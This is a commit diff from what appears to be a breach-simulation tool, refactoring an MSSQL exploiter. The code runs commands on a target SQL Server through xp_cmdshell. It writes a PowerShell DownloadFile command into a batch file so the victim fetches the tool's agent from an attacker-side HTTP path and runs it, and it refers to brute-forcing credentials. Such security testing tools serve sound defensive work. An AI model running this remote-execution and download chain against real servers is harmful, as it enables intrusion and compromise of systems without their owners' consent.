Agent: Refactor MSSQL agent download command

The first step in exploitation is to instruct the victim to download the agent. This commit refactors this code to remove the dependency on the MSSQLLimitedSizePayload. To do this, it introduces `_write_command_to_batch_file()` which will be reused by the agent execution command.
2022-06-14 12:32:29 -04:00 · 2022-06-14 12:32:29 -04:00 · 257c6b0b05
parent 7846a6cac1
commit 257c6b0b05
1 changed files with 19 additions and 19 deletions
--- a/monkey/infection_monkey/exploit/mssqlexec.py
+++ b/monkey/infection_monkey/exploit/mssqlexec.py
@ -37,7 +37,6 @@ class MSSQLExploiter(HostExploiter):
    XP_CMDSHELL_COMMAND_START = "xp_cmdshell '"
    XP_CMDSHELL_COMMAND_END = "'"
    EXPLOIT_COMMAND_PREFIX = "<nul set /p="
-    EXPLOIT_COMMAND_SUFFIX = ">{payload_file_path}"
    MONKEY_DOWNLOAD_COMMAND = (
        "powershell (new-object System.Net.WebClient)."
        "DownloadFile(^''{http_path}^'' , ^''{dst_path}^'')"
@ -133,9 +132,8 @@ class MSSQLExploiter(HostExploiter):
            sleep(MSSQLExploiter.QUERY_BUFFER)

    def upload_monkey(self, monkey_path_on_victim: PureWindowsPath):
-        monkey_download_command = self.write_download_command_to_payload(monkey_path_on_victim)
+        self._write_download_command_to_batch_file(monkey_path_on_victim)
        self.run_payload_file()
-        self.add_executed_cmd(monkey_download_command.command)

    def remove_temp_dir(self):
        # Remove temporary dir we stored payload at
@ -159,10 +157,24 @@ class MSSQLExploiter(HostExploiter):
        http_thread.stop()
        http_thread.join(LONG_REQUEST_TIMEOUT)

-    def write_download_command_to_payload(self, monkey_path_on_victim: PureWindowsPath):
-        monkey_download_command = self.get_monkey_download_command(monkey_path_on_victim)
-        self.run_mssql_command(monkey_download_command)
-        return monkey_download_command
+    def _write_download_command_to_batch_file(self, monkey_path_on_victim: PureWindowsPath):
+        agent_download_command = MSSQLExploiter.MONKEY_DOWNLOAD_COMMAND.format(
+            http_path=self.agent_http_path, dst_path=str(monkey_path_on_victim)
+        )
+        self._write_command_to_batch_file(agent_download_command)
+
+    def _write_command_to_batch_file(self, command: str):
+        write_to_file_command = f"<nul set /p={command}>{self.payload_file_path}"
+        self._run_mssql_command(write_to_file_command)
+
+    # Note: This is a strangler used to replace self.run_mssql_command()
+    def _run_mssql_command(self, command: str):
+        logger.debug(f"Running command on SQL Server: {command}")
+
+        self.cursor.execute(f"xp_cmdshell '{command}'")
+        self.add_executed_cmd(command)
+
+        sleep(MSSQLExploiter.QUERY_BUFFER)

    def get_monkey_launch_command(self, monkey_path_on_victim: PureWindowsPath):
        # Form monkey's launch command
@ -177,18 +189,6 @@ class MSSQLExploiter(HostExploiter):
            suffix=suffix,
        )

-    def get_monkey_download_command(self, monkey_path_on_victim: PureWindowsPath):
-        monkey_download_command = MSSQLExploiter.MONKEY_DOWNLOAD_COMMAND.format(
-            http_path=self.agent_http_path, dst_path=str(monkey_path_on_victim)
-        )
-        prefix = MSSQLExploiter.EXPLOIT_COMMAND_PREFIX
-        suffix = MSSQLExploiter.EXPLOIT_COMMAND_SUFFIX.format(
-            payload_file_path=self.payload_file_path
-        )
-        return MSSQLLimitedSizePayload(
-            command=monkey_download_command, suffix=suffix, prefix=prefix
-        )
-
    def brute_force(self, host, port, users_passwords_pairs_list):
        """
        Starts the brute force connection attempts and if needed then init the payload process.